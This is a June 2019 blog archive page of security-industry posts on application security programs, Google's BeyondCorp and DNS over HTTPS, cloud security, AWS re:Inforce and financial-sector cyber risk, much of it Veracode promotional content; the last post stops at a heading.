Monthly Archives: June 2019

Business-Focused Approach to Security Assurance Is More Evolution Than Revolution

Veracode Information Security Forum Security Assurance Research

According to a new research report from Information Security Forum (ISF), only 32 percent of its membership is satisfied with their security assurance program – though 80 percent say that they want to take a more business-focused approach to security. Given the ever-evolving threat landscape, security leaders understand that they always need their finger on the pulse of how secure their organization’s information is. This can prove to be challenging if the right processes and controls are not in place across development, IT, and security in your organization.

Often times, communicating the security of your organization –and communicating it well – comes down to asking the right people the right questions, and taking smaller steps to achieve the desired outcome. In the report, Establishing a Business-Focused Security Assurance Program, ISF proposes that organizations build on existing compliance-based approaches instead of recreating the wheel. To map out where the program needs to go and begin evolving it with business in mind, IFS notes that security leaders should:

  • Identify what business stakeholders want from security assurance
  • Break down the requirements into manageable tasks to move from current to future approaches
  • Apply repeatable security assurance process across multiple target environments (i.e. business processes, projects and supporting assets where appropriate in your organization)

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected, by focusing on how effective controls are,” said Steve Durbin, Managing Director, ISF. “A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

Including Secure Coding in the Security Control Discussion

According to the 2019 Verizon Data Breach Investigations Report, 62 percent of breaches and 39 percent of incidents occur at the web application layer. While it is unclear exactly how the web applications were compromised in some cases, it’s assumed that attackers are scanning for specific web app vulnerabilities, exploiting them to gain access, inserting some kind of malware, and harvesting personal data to create a profit.

An often-overlooked way to tighten security in your organization is to provide developers with the tools they need to code securely, and to continue learning about different vulnerabilities as they work. When development teams are able to scan for vulnerabilities in their code while they work, they’re less likely to be introduced in the QA and production stages. The State of Software Security Report Volume 9 shows that organizations that are conducting application security scanning more than 300 times per year are able to shorten flaw persistence by 11.5 percent.

This means that development leaders must be included in security control discussions. Their team may work in a different way than others across your organization, so understanding how to support them to make security a seamless priority in their day-to-day processes is a necessary step for security assurance. Once the DevSecOps approach to application development has been adopted, it’s even easier to verify for your executives – as well as customers and prospects – that you really do take security seriously.

The Right Analytics to Tell the Right Story

Analytics are useful for determining exactly what the right metrics are for AppSec managers to share with executives and their board. Given that policy compliance is often the number one priority for this audience, AppSec managers need to set their threshold for what they’re willing to accept and what they’re unwilling to accept when it comes to the appropriate level of risk and the type of data involved.

The Veracode Platform includes Veracode Analytics, which empowers our customers to set up custom analytics once they’ve determined their risk threshold and application criticality. With an easy-to-use dashboard view, AppSec managers can review their AppSec program to make sure that development and security teams alike are scanning all of their applications – and fixing what they find.

The Veracode Platform and Veracode Analytics can be a game-changer for your business, as it helps you to stay focused, motivate your teams, ensure better resource allocation, and help you more strategically communicate your security posture to the executive team.

For more on getting executive support for application security, see Everything You Need to Know About Getting AppSec Buy-In.

For more on measuring your application security program, see Everything You Need to Know About Measuring Your AppSec Program.

How Google adopted BeyondCorp


It's been almost five years since we released the first of multiple BeyondCorp papers, describing the motivation and design principles that eliminated network-based trust from our internal networks. With that anniversary looming and many organizations actively working to adopt models like BeyondCorp (which has also become known as Zero Trust in the industry), we thought it would be a good time to revisit topics we have previously explored in those papers, share the lessons that we have learned over the years, and describe where BeyondCorp is going as businesses move to the cloud.

This is the first post in a series that will focus on Google’s internal implementation of BeyondCorp, providing necessary context for how Google adopted BeyondCorp.

Why did we adopt BeyondCorp?

With a traditional enterprise perimeter security model, access to services and resources is provided by a device being connected to a privileged network. If an employee is in a corporate office, on the right network, services are directly accessible. If they're outside the office, at home or in a coffee shop, they frequently use a VPN to get access to services behind the enterprise firewall. This is the way most organizations protect themselves.

By 2011, it became clear to Google that this model was problematic, and we needed to rethink how enterprise services are accessed and protected for the following reasons:

Improving productivity
  • A growing number of employees were not in the office at all times. They were working from home, a coffee shop, a hotel or even on a bus or airplane. When they were outside the office, they needed to connect via a VPN, creating friction and extending the network perimeter.
  • The user experience of a VPN client may be acceptable, even if suboptimal, from a laptop. Use of VPN is less acceptable, from both employees and admins perspectives, when considering growing use of devices such as smartphones and tablets to perform work.
  • A number of users were contractors or other partners who only needed selective access to some of our internal resources, even though they were working in the office.
Keeping Google secure
  • The expanded use of public clouds and software-as-a-service (SaaS) apps meant that some of our corporate services were no longer deployed on-premises, further blurring the traditional perimeter and trust domain. This introduced new attack vectors that needed to be protected against.
  • There was ongoing concern about relying solely on perimeter defense, especially when the perimeter was growing consistently. With the proliferation of laptops and mobile devices, vulnerable and compromised devices were regularly brought within the perimeter.
  • Finally, if a vulnerability was observed or an attack did happen, we wanted the ability to respond as quickly and automatically as possible.

How did we do it?

In order to address these challenges, we implemented a new approach that we called BeyondCorp. Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN. BeyondCorp has three core principles:
  • Connecting from a particular network does not determine which service you can access.
  • Access to services is granted based on what the infrastructure knows about you and your device.
  • All access to services must be authenticated, authorized and encrypted for every request (not just the initial access).


High level architecture for BeyondCorp

BeyondCorp gave us the security that we were looking for along with the user experience that made our employees more productive inside and outside the office.

What lessons did we learn?

Given this was uncharted territory at the time, we had to learn quickly and adapt when we encountered surprises. Here are some key lessons we learned.

Obtain executive support early on and keep it

Moving to BeyondCorp is not a quick, painless exercise. It took us several years just to get most of the basics in place, and to this day we are still continuing to improve and refine our implementation. Before embarking on this journey to implement BeyondCorp, we got buy in from leadership very early in the project. With a mandate, you can ask for support from lots of different groups along the way.

We make a point to re-validate this buy-in on an ongoing basis, ensuring that the business still understands and values this important shift.

Recognize data quality challenges from the very beginning

Access decisions depend on the quality of your input data. More specifically, it depends on trust analysis, which requires a combination of employee and device data.

If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.
We put in a lot of work to make sure our data is clean and reliable before making any impactful changes, and we have both workflows and technical measures in place to ensure data quality remains high going forward.

Enable painless migration and usage

The migration should be a zero-touch or invisible experience for your employees, making it easy for them to continue working without interruptions or added steps. If you make it difficult for your employees to migrate or maintain productivity, they might feel frustrated by the process. Complex environments are difficult to fully migrate with initial solutions, so be prepared to review, grant and manage exceptions at least in the early stages. With this in mind, start small, migrate a small number of resources, apps, users and devices, and only increase coverage after confirming the solution is reliable.

Assign employee and helpdesk advocates

We also had employee and helpdesk advocates on the team who represented the user experience from those perspectives. This helped us architect our implementation in a way that avoided putting excess burden on employees or technical support staff.

Clear employee communications

Communicating clearly with employees so that they know what is happening is very important. We sent our employees, partners, and company leaders regular communications whenever we made important changes, ensuring motivations were well understood and there was a window for feedback and iteration prior to enforcement changes.

Run highly reliable systems

Since every request goes through the core BeyondCorp infrastructure, we needed a global, highly reliable and resilient set of services. If these services are degraded, employee productivity suffers.

We used Site Reliability Engineering (SRE) principles to run our BeyondCorp services.

Next time

In the next post in this series, we will go deeper into when you should trust a device, what data you should use to determine whether or not a device should be trusted, and what we have learned by going through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

This post was updated on July 3 to include Justin McWilliams as an author.

Top 3 Challenges with Securing the Cloud

Cloud SecurityBy 2020,  it’s predicted that 83% of company workload will be stored in the cloud (Forbes).  This rise in usage and popularity comes at no surprise with how cost-effective and easy it is to manage systems in the cloud.

As more critical applications are migrating towards the cloud, data privacy and software security are becoming a greater concern.  With 60% of web applications compromised due to cloud-based email servers (Verizon 2019 DBIR), it’s time to take these concerns seriously.

The cloud has had its share of attacks over the years, from DDoS to data loss attacks and even data breaches.  Whether malicious tampering or accidental deleting, these attacks can lead to a loss of sensitive data and often a loss of revenue.

How exactly do we secure data and prevent against these attacks in the cloud?

The one way to truly secure your data in the cloud is through continual monitoring of your cloud systems. However, this is a challenging process for several reasons:

1.    Lack of Visibility

Cloud technology solutions often make the job of security providers more difficult because they don’t provide a single-pane-of-glass to view all endpoints and data. For this reason, you need a vast number of tools to monitor your cloud systems. For example, most cloud solutions send email notifications that provide some visibility into your environment.  However, these notifications don’t always provide enough insight into what exactly happened. You may receive an email alert about a suspicious login, but many of these alerts don’t give information about where the login attempt happened and what user was affected.

These vague alerts mean you have to investigate further; however, many of these cloud systems don’t have very useful investigative tools. If you want to find out more about the alert, you may be able to view the reports and read the logs associated with the activity, but that requires practice in knowing what to look for and how to interpret the information. This leads to another challenge in cloud security: lack of expertise.

2.    Lack of Expertise

It takes practice to be able to look at security logs and interpret what the activity means. Different cloud providers may produce different types of logs and it can be difficult to translate the many varying log types.

If you want to secure your cloud environment properly, you will need a team dedicated to configuring, monitoring and managing these tools. Through 2022, it’s predicted that 95% of cloud security failures will result from customer error (Gartner).  This reinforces the need to configure your cloud environment properly. Interpreting logs and configuring cloud systems requires skills that are developed overtime.  Many security professionals lack this particular expertise or the time required to properly develop these skills.

Those that do possess these skills and knowledge are in high demand, and there simply aren’t enough people to fill these positions.

3.    Lack of Resources

Implementing all the right tools and staffing appropriately to monitor these tools around-the-clock is not an inexpensive endeavor.  Luckily, there are services you can leverage to augment your staff and monitor your environment, such as a managed security services provider (MSSP).

MSSPs have the tools and resources to pull information from all of your different cloud systems and monitor them in one place.  With a full staff of experts on-hand at all hours, an MSSP is fully prepared to monitor and respond to incidents. They can help provide the expertise and visibility into your cloud environment required to properly secure your cloud systems.

The post Top 3 Challenges with Securing the Cloud appeared first on GRA Quantum.

Live from AWS re:Inforce: Learnings from Security Enablement for DevOps at AT&T

Veracode AWS reInforce Building an AppSec Program

This week, AWS ran its inaugural security conference AWS re:Inforce in Boston. There were several interesting talks at the conference, and I found John Maski’s presentation, “Integrating AppSec in your DevSecOps on AWS,” contained great practical advice. Maski worked for AT&T for 32 years, with his most current role being Director, Production Resiliency & DevSecOps Enablement. He recently joined Veracode to advise customers on how to best integrate Veracode into their security pipeline, and we’re lucky to have him on the team.

Support from Executive Leadership is Crucial

Starting out, and as expected for any large organization, Maski found a huge variety of skill levels and a lot of variation in how people ran their development pipelines outside of the central DevOps initiative.  Software development was optimized for speed – aka “quantity” – and security was an afterthought. 

On the upside, Maski saw pockets of advanced knowledge and CI/CD implementations. A significant CI/CD platform was already in the works. Most importantly, there was a huge appetite among executives for making quick and extensive progress.

“In an organization the size of AT&T, you can’t make meaningful progress without the support of executive leadership,” Maski said. “It is absolutely critical to drive the necessary cultural changes.”

With this backing, he set out to connect with partner organizations, working collectively towards the seemingly impossible goal to secure AT&T’s entire application landscape. Spoiler alert: When Maski recently left AT&T, they were very close to completing this goal.

Integrating Security into the CI/CD Pipeline

If you are coming from the security side of the house and are in charge of application security, it really pays off to truly understand your organization’s development tools and how pipelines are set up. Not only will you be able to speak your engineering team’s language, you will be better suited to advise them on how to integrate security testing solutions.

Most of application security can and should be automated, with the exception of what’s at the very beginning and the very end of the process. Threat modeling is still a manual process that relies on human understanding of the architecture, even if there are tools that help visualize and document this process. Likewise, penetration testing is a final litmus test at the end of the development process that should be carried out on any critical application before it is deployed into production.

In the middle are various automated testing solutions that should be run automatically to regularly provide feedback on security defects. Static analysis tests the application code for a broad range of security flaws, and it can be fully automated into both the IDE and the CI process. In the IDE, it provides early security guidance and education to software engineers while they are coding by highlighting potential vulnerabilities and suggesting best practices. Veracode has found that integrating SAST in this early stage in the process has helped organizations to reduce newly introduced flaws by 60 percent.

However, guidance at this stage is not mandatory and is mostly suitable to removing flaws in newly written code. To ensure a more structured feedback and compliance process, static analysis should be integrated into the SDLC. Typically, development teams would scan as part of their CI process, either on a code commit or a pull request, and get security defects flagged through the ticketing system. They will do this scan in a “sandbox,” so that results do not get escalated to the security team. Finally, for high security applications, we recommend doing a scan on the full scope of the application before each deployment to ensure that no security defects escape to production.

Software composition analysis looks at known vulnerabilities in open source libraries that are being used in the code. If you find such a vulnerability, the fix is usually upgrading to a different library version rather than fixing the open source code yourself. SCA often integrates with the SDLC in the same places as static analysis.

Dynamic analysis is a third way of looking for vulnerabilities in software and is typically applied to web applications. Unlike static analysis, which looks at the application code, dynamic analysis interacts with the application via an instrumented browser that crawls and audits the application. While findings with other testing solutions overlap, there are several security issues that only dynamic analysis can detect, including server configuration errors. Dynamic analysis is typically run in the QA stage against a staging server and against the production server.

Five Tips for Getting Traction with Your DevSecOps Initiative

With many lessons learned having during his DevSecOps initiative at AT&T, Maski shared his five recommendations to get traction with your own program:

  1. Partner with stakeholders: Identify, collaborate, and align with your partners, especially in software development. You have to understand their world and respect their point of view for your program to be successful.
  2. Pick the right metrics: Know your metrics before you jumpstart the program. Talk upfront with your sponsors and partners on what success means to them and agree on metrics.
  3. Don’t boil the ocean: Go “Agile.” Pick pilot applications to secure, so that you can learn from the process and expand to the next group of applications. Keep note of what you learn along the way to improve the program over time.
  4. Run an internal campaign: Communicate effectively to raise awareness about the importance of AppSec to the business. Tie AppSec to the mission of the company. Use your communication to educate DevOps team members about AppSec to help strengthen their expertise.
  5. Demonstrate progress: To ensure continued executive support for your program, regularly report your program’s progress through the metrics you picked. Tailor your progress reports to the audience; for example, your senior leadership will want to see different metrics than your engineering partners.

Key Learnings from AT&T’s DevSecOps Program

Maski left the audience with three key learnings from running his program:

  • Strong Executive Leadership is key to driving the necessary cultural changes – and to secure the required budget.
  • If getting your program started quickly is a requirement, use services built on a robust platform. That way you can focus on onboarding applications rather than building and maintaining scanning infrastructure.
  • Build a strong team and have a flexible plan. Map out and communicate your plan with confidence. That doesn’t mean that your plan has to be perfect – learn and adjust as you go along. Set bold goals to drive progress.

Veracode was and is a cornerstone of AT&T’s AppSec strategy. If you’d like to learn how to build an AppSec program in your organization, download The Ultimate Guide to Getting Started With Application Security.

Google Public DNS over HTTPS (DoH) supports RFC 8484 standard



Ever since we launched Google Public DNS in 2009, our priority has been the security of DNS resolution. In 2016, we launched a unique and innovative experimental service -- DNS over HTTPS, now known as DoH. Today we are announcing general availability for our standard DoH service. Now our users can resolve DNS using DoH at the dns.google domain with the same anycast addresses (like 8.8.8.8) as regular DNS service, with lower latency from our edge PoPs throughout the world.

General availability of DoH includes full RFC 8484 support at a new URL path, and continued support for the JSON API launched in 2016. The new endpoints are:

  • https://dns.google/dns-query (RFC 8484 – GET and POST)
  • https://dns.google/resolve (JSON API – GET)
We are deprecating internet-draft DoH support on the /experimental URL path and DoH service from dns.google.com, and will turn down support for them in a few months.

With Google Public DNS, we’re committed to providing fast, private, and secure DNS resolution through both DoH and DNS over TLS (DoT). We plan to support the JSON API until there is a comparable standard for webapp-friendly DoH.


What the new DoH service means for developers

To use our DoH service, developers should configure their applications to use the new DoH endpoints and properly handle HTTP 4xx error and 3xx redirection status codes.
  • Applications should use dns.google instead of dns.google.com. Applications can query dns.google at well-known Google Public DNS addresses, without needing an extra DNS lookup.
  • Developers using the older /experimental internet-draft DoH API need to switch to the new /dns-query URL path and confirm full RFC 8484 compliance. The older API accepts queries using features from early drafts of the DoH standard that are rejected by the new API.
  • Developers using the JSON API can use two new GET parameters that can be used for DNS/DoH proxies or DNSSEC-aware applications.
Redirection of /experimental and dns.google.com

The /experimental API will be turned down in 30 days and HTTP requests for it will get an HTTP redirect to an equivalent https://dns.google/dns-query URI. Developers should make sure DoH applications handle HTTP redirects by retrying at the URI specified in the Location header.

Turning down the dns.google.com domain will take place in three stages.
  1. The first stage (in 45 days) will update the dns.google.com domain name to return 8.8.8.8 and other Google Public DNS anycast addresses, but continue to return DNS responses to queries sent to former addresses of dns.google.com. This will provide a transparent transition for most clients.
  2. The second stage (in 90 days) will return HTTP redirects to dns.google for queries sent to former addresses of dns.google.com.
  3. The final stage (in 12 months) will send HTTP redirects to dns.google for any queries sent to the anycast addresses using the dns.google.com domain.
We will post timelines for redirections on the public‑dns‑announce forum and on the DoH migration page. You can find further technical details in our DoH documentation, and if you have a question or problem with our DoH service, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem!

Key Components to Consider When Kicking Off Your Veracode AppSec Program

I’ve been working as a Veracode security program manager since 2013, and have adopted AppSec best practices in those six years that contribute to successful AppSec programs. I started my journey here as a program manager and was fortunate enough to manage and lead some of Veracode’s largest and most complex customer programs. Today, I’m managing a team of program managers.

In this blog, I will walk through four key components to consider when kicking off your program with Veracode. These are all components I’ve implemented when managing large programs, and which have led to AppSec success by helping organizations understand what’s needed in order to have a successful, well-functioning application security program.  

Customer Engagement

The first component is Veracode customer engagement. You might be thinking, “of course, this is a given,” but in some cases I’ve seen (moreso in the past), it’s not. The No. 1 roadblock with the customers I’ve seen struggle has been lack of engagement. An established security team (on the client side) who can act as the liaison between the development organization and Veracode is very important. In some cases, increasingly so with the DevSecOps push, dev management is involved as well.

When I first began my journey with Veracode, security didn’t exist at many organizations, so an engaged team also didn’t exist. Today, when I go on-site and meet with my customers, I frequently thank them. I thank them for their dedication and engagement level, because without the primary, day-to-day contacts, it would be more difficult to get the necessary traction. At Veracode, we say it’s a team effort. Customers who identify teams who are willing and eager to work with their Veracode contacts is the No. 1 step toward success. This is also a team or individual who can act as a Veracode advocate and work with the Veracode SPM to tackle Veracode initiatives and be an internal presence that helps drive and motivate, making security No. 1 so that our clients’ customers are confident they’re using secure products and applications.

Cross-Functional Communication

My second on the list is cross-functional communication. It is imperative for a program to have cross-functional communication between the security team and main teams involved, including executives and the development organization. Communicating policy mandates, remediation plans, and automation plans across all functions, including developers and DevOps teams, early on in the program, is going to put a program ahead. Understanding what the best communication method is in order to circulate important plans across teams, whether it’s through email or a newsletter, and who should be delivering it, should be well thought out. Veracode Program Management acts as an extension of our customers’ teams and, therefore, can help with messaging and delivery.  

Ultimately, communication will prevent confusion and promote awareness, which is important to the health of a program. When a developer is introduced to security scanning requirements or remediation plans later in the development lifecycle, it can affect release dates. The team will be in a much better position if they know early on what they’re responsible for and when, and any consequences if they do not incorporate security into their SDLC.

Application Inventory

Next is application inventory, which is another major component. This is a list of your organization’s high-risk applications that are most critical to the business and could impact company brand or reputation if breached, OR application inventory could be all applications in the organization. If you do not know this information early on, it could cause delays when kicking off a program.

We recommend companies scan all their applications. However, many organizations start their programs with a baseline of only their high-risk applications. If you fall into this category, having that list ready and sharing it with your Veracode Security Program Manager will keep everyone in alignment. Your SPM will provide a list of the important information needed when gathering application inventory information, and prior to setting up application profiles in the Veracode platform.

Program Strategy

Finally, once you’ve identified your team, have a communication plan in place, and have created an application inventory, the next step is to map out program strategy. This is where your Veracode SPM will have a discovery session with you and your team to discuss the future of the program, and obtain key information to ensure success. He or she will also review the critical activities that need to take place in the security program to keep it on track. Additionally, the SPM will review measureable metrics with you and discuss what the key metrics are to the organization/teams in order to track program success down the road. The SPM will handle the operational effort to get you there and report back regularly to ensure that you are achieving your organizational goals through those metrics.

The SPM will ask several questions to help develop and kick off your program, including:

  • Details about your SDLC environment, development tools, and systems the development teams are using. This is imperative as the push to shift left and toward DevSecOps is a major focus for many organizations today. The end goal is to fully automate your application security program, because automating and integrating security into your CI/CD pipeline will make for a seamless program that will save you and your developers time and money.
  • Identifying development teams and setting onboarding schedules. Training users on how to use the Veracode platform will help immensely with developer adoption and awareness. Veracode provides training and always offers flexible schedules to accommodate developers globally.
  • Establishing a remediation process and workflow. The end goal is to bring down those very high and high flaws to get you closer to being compliant with your organization’s policies and standards.

Lastly, we will have discussions around automation and integration into your CI/CD pipeline. As mentioned, this will save time for developers by streamlining the scanning process through automation and having them consume Veracode scan results in their environment, rather than manually running scans and reviewing results in the UI.

Whether you’re an existing customer or potential customer, if all of these items are checked off at the beginning, then you will be on the right path to kick-starting a robust application security program that everyone at your organization will be onboard with.  

Learn More

Get more details on maturing your application security program in our guide, Everything You Need to Know About Maturing Your Application Security Program.

And you can always get valuable tips and advice on managing AppSec from other Veracode customers in our Community.

Veracode to showcase DevSecOps solutions at inaugural AWS re:Inforce

Developers and security professionals from around the world are descending on Boston this week to attend the first AWS security conference, re:Inforce, for what promises to be one of the most exciting events in recent memory in the industry.

As a pioneer of application security that is helping educate both security and dev teams in building more secure code, Veracode is proud to be a platinum sponsor of AWS re:Inforce here in Boston, a world renowned hub of cybersecurity innovation.

With so many security conferences taking place throughout the year around the world, and with more companies entering the market and crowding niches, it can have a dizzying effect for companies buying security solutions.

What makes AWS re:Inforce different?

Companies seeking to change the world are using software to push entire industries forward with new advancements, better insights and greater efficiencies. At the same time, new threat vectors appear, and new languages and frameworks change how we create software, causing cyberattacks to evolve and become more sophisticated. The security of software is just as critical as the function of the software itself. But, if the software you are developing or buying is insecure, you can’t achieve your vision – no matter how important or innovative it is.

Two movements that are allowing innovation and security to evolve in harmony – the shift to cloud-native solutions and the evolution of DevSecOps – will be on full display at AWS re:Inforce. That’s because we’ve moved from a world where applications were only run in the cloud to one where they are written and live in the cloud throughout their lifecycle. As a result, we are experiencing a dramatic increase in scan frequency and our customers are adopting application security practices earlier in their continuous integration pipeline. More frequent, incremental scans in the SDLC – a pillar of DevSecOps – allow companies to fix flaws more than 11 times more quickly than the typical organization. Fundamentally, when a company’s applications are more secure and their development teams are not slowed down by security, they achieve a competitive advantage.

Veracode is evolving its SaaS architecture by leveraging the power of AWS to better meet increased demand for DevSecOps practices from customers. Development teams are looking for fast, accurate application security tools integrated directly into their CI/CD work cycles. Veracode processes an average of more than 400,000 scans per month for customers around the world, and companies expect fast scan times and the ability to rapidly scale their volume of scanning given that developers scan at every code check in. Veracode’s combination of technology, expertise, and services backed by AWS cloud services helps organizations more effectively find and fix the vulnerabilities in their software.

Veracode has also achieved Advanced Technology Partner Status in the AWS Partner Network (APN). This achievement is the highest tier within the AWS Partner Network. It recognizes a rigorous qualification process that includes AWS technical certification and validation with a wide range of customer references. The technical certification included an extensive review of the Veracode architecture leveraging AWS services against AWS published best practices and benchmarks for security, scalability and availability.

At AWS re:Inforce, attendees can visit the Veracode booth (#813) to learn more about the company’s application security testing platform, get a Veracode t-shirt and participate in an interactive experience designed to test developers’ secure programming knowledge.

On the evening of Tuesday, June 25, Veracode is hosting a “Conquer the Cloud” afterparty at City Tap House in Boston. Securing the cloud takes a tribe of AppSec heroes, and we’d love your tribe to meet ours over beers, games, and live music during AWS re:Inforce. Take a moment to register here.

Finally, don’t miss a presentation at re:Inforce by John Maski, Veracode Application Security Consultant and former director of DevSecOps at AT&T, titled “Integrating AppSec Into Your DevSecOps on AWS.” John will describe securing CI/CD pipelines in enterprise environments and “shifting left” with security. This talk is taking place at 10:15 am, Wed., June 26 in the Solutions Theater.

How can UK Financial Services Organisations Combat the Cyber Threat?

Guest article by Genevra Champion, Sector Marketing Manager at IT Governance

The financial services industry is naturally a lucrative target for cyber criminals. Financial organisations trade and control vast amounts of money, as well as collect and store customers’ personal information so clearly, a data breach could be disastrous for an industry that is built on trust with its customers.

The financial services industry is second only to retail in terms of the industries most affected by cyber crime – the number of breaches reported by UK financial services firms to the FCA increased 480 per cent in 2018, compared to the previous year. While financial services organisations are heavily regulated and cybersecurity is becoming more of a business priority, there is still much more to be accomplished when it comes to businesses understanding what measures must be taken – from the C-suite down – to effectively protect organisations against inevitable breaches.

So how can financial services firms proactively equip themselves to respond to increased regulatory scrutiny and mitigate the impact from the growing number of threats they will face?

Mitigating the Cyber Threat Financial institutions were able to defend against two-thirds of unauthorised fraud attempts in 2018, but the scale of attacks significantly increased. Significant market players including Tesco Bank, Metro Bank and HSBC all reported breaches in the last year. Clearly, the banks’ cybersecurity defences have not developed at a fast enough pace. Cyber criminals can and will dramatically outspend their targets with increasingly sophisticated attack methods. In addition, many of the traditional banks struggle with large, cumbersome legacy systems, which pose significant reliability issues, as well as flaws in security.

Last year’s IT banking disaster led to thousands of TSB customers being locked out of their accounts, leading to fraudsters exploiting the situation by posing as bank staff on calls to customers in order to steal significant sums of money from customers. The breach occurred while the company was conducting an upgrade on its IT systems to migrate customer data to a new platform. This wasn’t just bad luck for TSB, but a failure to adequately plan and assess the risks that come with such a huge project. The bank has since pledged to refund all customers that are victims of fraud, a move which will likely see other banks reviewing their approach to the rise of this particular type of cybercrime.

The industry must understand that security incidents are an ever-present risk. However, organisations can be prepared - scoping a defence strategy specific to the firm, with processes for implementation, will mean an attack can be quickly identified, isolated and resolved, minimising business impact.

Appropriate Defence Strategy
The FCA has set out various cybersecurity insights that show how cybersecurity practices of UK financial services firms are under the regulatory microscope, as the cyber threat continues to grow. The approach from the FCA includes practices for organisations to put into action such as those that promote governance and put cyber risk on the board agenda. The advice also covers areas such as identifying and protecting information assets, being alert to emerging threats and being ready to respond, as well as testing and refining defences. With cybercrime tools and techniques advancing at a rapid pace, and increasing regulations, it’s no wonder that many organisations struggle to keep up to ensure their defences stay ahead of the game.

In order for in-house security teams to keep up to date with current and evolving threats and data protection issues, firms must invest in regular training. Specialist skills are required to mitigate cyber risk, which for some could be cost-prohibitive. As an alternative, an insourced model allows you to leverage a dedicated and skilled team on an ‘as you need’ basis to deliver an appropriate strategy. With a Cyber Security as a Service (CSaaS) model in place, organisations can rapidly access a dedicated team with the knowledge and skills to deliver a relevant and risk appropriate cyber security strategy.

Crucially, in addition to completing a gap analysis and a multi-layered defence strategy, the model will also apply to people and processes. Attackers will generally aim at the weakest point of an organisation – often it’s staff. Human nature means passwords are forgotten, malware isn’t noticed, or phishing emails are opened, for example. Therefore, a blended approach of technology, processes and shared behaviour is required that promotes the need for staff awareness and education of the risks, in order to effectively combat the threat.

Conclusion
With increased regulatory attention across security and privacy, firms must take steps to improve their defences, or risk severe financial and reputational damage. The issue of cybersecurity risk must become as embedded within business thinking as operational risk. Anyone within an organisation can be a weak link, so the importance of cybersecurity defences must be promoted at all levels – from the board all the way through to the admin departments. It’s everyone’s responsibility to keep the organisation protected against threats.

While the threat of cyber attack is real, financial services firms do not have to take on the battle alone. With a CSaaS model in place, organisations can start to take back control of their cybersecurity strategy and embed it as a trusted, cost-effective and workable core part of the business’ process.

Live From Gartner Security & Risk Mgmt Summit: Starting an AppSec Program, Part 2

This is part two of a two-part blog series on a presentation by Hooper Kincannon, Cyber Security Engineer at Unum Group, on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. In this presentation, Hooper provided a great blueprint for starting a DevSecOps program. In part one, I summarized how Hooper got buy-in for his program and his overall plan for the initiative. In this blog, we delve into the details.

Using Different Assessment Types for the Right Purpose

Hooper kindly shared his slides with us. Here is his helpful comparison of different assessment types, focusing on static analysis, dynamic analysis and manual penetration testing:

You have to make a choice which route you’d like to take. In Hooper’s case, he decided to build static and dynamic application security into the SDLC.

Dynamic and Static Analysis Workflow

For dynamic analysis testing, Hooper recommeds the following workflow:

To make your DAST assessments successful, he recommended using a consistent scan duration, considering the various authentication mechanisms, and using the testing credentials only for testing.

For static analysis testing, he recommended the following workflow:

His recommendations for static analysis testing included being conscious of how you define applications, being aware of compilation instructions, and consistency of the process.

Understanding Remediation vs. Mitigation

After you have identified a vulnerability, you can address it in two different ways:

  • Remediation: Fixing the security defect by changing the code that contains the defect or making a configuration change. This eliminates the risk.
  • Mitigation: Implementing controls to make it less likely that the vulnerability is exploited. This reduces the risk but does not eliminate it because the vulnerability is still present in the code.

Working With Scanning Results

How you use your scan results can make or break your program. If you’re fortunate, you’ll scan your application and get back a low volume of flaws. If you’re unlucky, it may be the opposite.

Hooper’s biggest recommendation is not to panic: The overall goal is to reduce risk, and that won’t happen overnight. Take your time to digest the results and discuss how to best prioritize them. For example, consider fixing dynamic results first because they are easier to discover by an attacker. Decide what you accept as trusted sources, especially in the case of input validation, and have a process for handling exceptions, such as acceptable risk, mitigations, and false positives. Hooper recommends that you do a readout of the results with the stakeholders.

Picking the Right Metrics to Report On

Metrics are probably the most important deliverable coming out of your program. Security is a difficult metric to measure; reduction in risk is a bit easier.

Metrics that worked for Hooper are:

  • Flaw density
  • Risk reduced (vulnerability severity reduced)
  • Most common flaw types (use to guide education efforts)
  • Compliance over time
  • Onboarding time + other operation metrics

When presenting to the different stakeholders of the program, be aware of what each constituency is interested in – because it varies:

  • CISO + senior management: Profitability of the investment
  • Business leaders: Resource allocation
  • Development: Staying on top of flaws

Keeping a regular cadence is vital. Hooper has made these activities part of his program:

  • Monthly scorecards
  • Monthly executive dashboards
  • Annual reviews
  • Real-time dashboards for developers

Optimizing the Program in Year Two

One year after starting the program, Hooper had reached success with external high-risk applications. Next, he moved on to internal high-risk applications. In addition, he started to automate more and more of the program to make it repeatable and easier to manage. For most organizations, he recommends starting out with automation from day one, but even if you start out manually, you’re taking a step in the right direction.

Here is a picture of how Unum Group integrates Veracode into their SDLC:

For More Information

If you’re interested in starting your own application security program, read our take on Everything You Need To Know About Getting Application Security Buy-In.

Live From Gartner Security & Risk Mgmt Summit: Starting a Web Application Security Program

Bootstrapping an application security program is hard. Technology is only one part of the equation. You need to inventory your applications, get stakeholders on board, and then execute on the holy trinity of people, process, and technology. That’s why I was excited to see Hooper Kincannon, Cyber Security Engineer at Unum Group, present on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. Hooper provided a great blue print for starting a DevSecOps program.

Sixty Vulnerabilities Are Reported Every Day, 27 Percent Are Never Fixed

Hooper began his presentation by outlining the current state of both software, and software security. He points out that while software is changing the world, it is also fundamentally flawed from a security perspective.

He points to some highlights from a study by Risk Based Security:

  • More than 22,000 vulnerabilities were disclosed in 2018 – that’s about 60 per day.
  • Almost a third of these (27%) were never fixed, so security professionals can’t just deploy a patch to improve their security posture.
  • Web-related vulnerabilities accounted for nearly half of all reported security flaws, and more than two thirds were related to insufficient or improper validation of input.
  • 33% received a severity rating of seven or above.
  • OWASP Top 10 still account for two-thirds of the reported vulnerabilities.

What can we do about it? We can develop a secure software development lifecycle and try to stem the flow of the vulnerabilities being published in the first place. This is becoming increasingly difficult because more lines of code are be written than ever before (111 billion lines of code in 2016, trending up).

Software Is Becoming Mission Critical: Making the Case for AppSec

